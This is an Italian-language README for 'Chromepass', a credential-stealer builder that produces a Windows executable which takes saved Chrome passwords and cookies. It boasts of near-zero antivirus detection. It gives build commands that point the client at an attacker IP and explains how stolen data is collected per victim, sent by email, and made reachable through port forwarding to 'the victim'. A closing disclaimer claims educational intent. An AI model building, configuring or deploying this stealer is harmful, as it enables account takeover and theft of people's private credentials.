
Chromepass - Hacking delle password salvate di Chrome
Vedi Demo
·
Segnala un bug
·
Richiedi una funzione
Chromepass è un'applicazione console basata su Python che genera un eseguibile Windows con le seguenti funzionalità:
La nuova metodologia di creazione del client garantisce praticamente un tasso di rilevamento dello 0%, anche senza tattiche di evasione antivirus. Se in futuro ciò non dovesse più essere vero, verranno implementati alcuni metodi per migliorare l'evasione antivirus.
Un esempio delle ultime scansioni (nota: nell'arco di 10-12 ore si passa da 0-2 rilevamenti a 32 rilevamenti, quindi esegui l'analisi sulle tue build):
Questa è un'applicazione molto semplice che utilizza solo:
Si consiglia di eseguire l'installazione all'interno di una VM Windows. Alcune parti della procedura di installazione potrebbero essere influenzate da configurazioni esistenti. Questo è stato testato su una VM Windows 10 pulita.
Chromepass richiede Windows per la compilazione! Il supporto per Linux e macOS potrebbe essere aggiunto in futuro.
git clone https://github.com/darkarp/chromepass
Nota: In alternativa alla clonazione del repository, è possibile scaricare l'ultima release, poiché il repository potrebbe essere più soggetto a bug.
Le dipendenze vengono controllate e installate automaticamente, quindi puoi passare direttamente a Utilizzo. Si consiglia di utilizzare una VM pulita, per assicurarsi che non ci siano conflitti.
Se non hai le dipendenze e la tua connessione internet non è veloce, ci vorrà un po'. Prenditi un caffè.
Chromepass è molto semplice. Inizia eseguendo:
python create.py -h
Apparirà un elenco di opzioni, autoesplicative.
Eseguire senza parametri creerà il server e il client che si connette a 127.0.0.1.
Un semplice esempio di build:
python create.py --ip 92.34.11.220 --error --message 'An Error has happened'
Dopo aver creato il server e il client, assicurati che il server sia in esecuzione quando il client viene avviato.
I cookie e le password verranno salvati in file json in una nuova cartella chiamata data nella stessa directory del server, separati per indirizzo IP.
Chromepass supporta l'invio dei file via email, anche se è ancora sperimentale.
Per abilitarlo, puoi usare il flag --email durante la creazione del server. Ti serviranno due cose: un nome utente (la tua email) e una password (una password dell'app).
Per generare una password dell'app, devi andare nelle impostazioni dell'account -> Sicurezza e abilitare l'autenticazione a due fattori (obbligatoria!)
Dopo aver abilitato l'autenticazione a due fattori, vedrai una nuova opzione chiamata App Passwords:

Fai clic lì, scegli le opzioni appropriate e genera una password:

Dopo aver cliccato su Genera, ti verrà fornita la password necessaria.
Puoi usare nome utente e password direttamente nel comando o semplicemente inserirli nel file config.ini, dove sono indicati YOUR_USERNAME e YOUR_PASSWORD.
python create.py --error --message 'An Error has happened' --email --username [email protected] --password qwertyuiopasdfghh
python create.py --error --message 'An Error has happened' --email
Se desideri utilizzarlo in uno scenario remoto, devi anche eseguire il port forwarding (porta 80 di default), in modo che quando la vittima esegue il client possa connettersi al server sulla porta corretta.
Per informazioni più generali, clicca qui. Se non sei ancora soddisfatto, esegui una ricerca su Google.
La configurazione automatica è sperimentale. Per un motivo o per un altro, la configurazione potrebbe non installare correttamente le dipendenze. In tal caso, devi installarle manualmente.
Fortunatamente ci sono solo 2 dipendenze:
Invece degli strumenti di compilazione, puoi anche installare Visual Studio, ma occuperà più spazio.
Dopo aver installato correttamente gli strumenti di compilazione, puoi semplicemente eseguire rustup-init.exe dal sito web di Rustup.
Questo completa le dipendenze necessarie e dovresti essere pronto.
Se trovi un errore o un bug, segnalalo come issue. Se desideri suggerire una funzionalità o un miglioramento, segnalalo nelle pagine delle issue.
Segui i modelli mostrati quando crei l'issue.
Per accedere a una community piena di aspiranti esperti di sicurezza informatica, dal principiante assoluto al veterano esperto, unisciti al nostro server Discord: WhiteHat Hacking
Se desideri contattarmi, puoi farlo tramite: [email protected]
Non sono responsabile per ciò che fai con le informazioni e il codice forniti. Questo è inteso solo per scopi professionali o educativi.
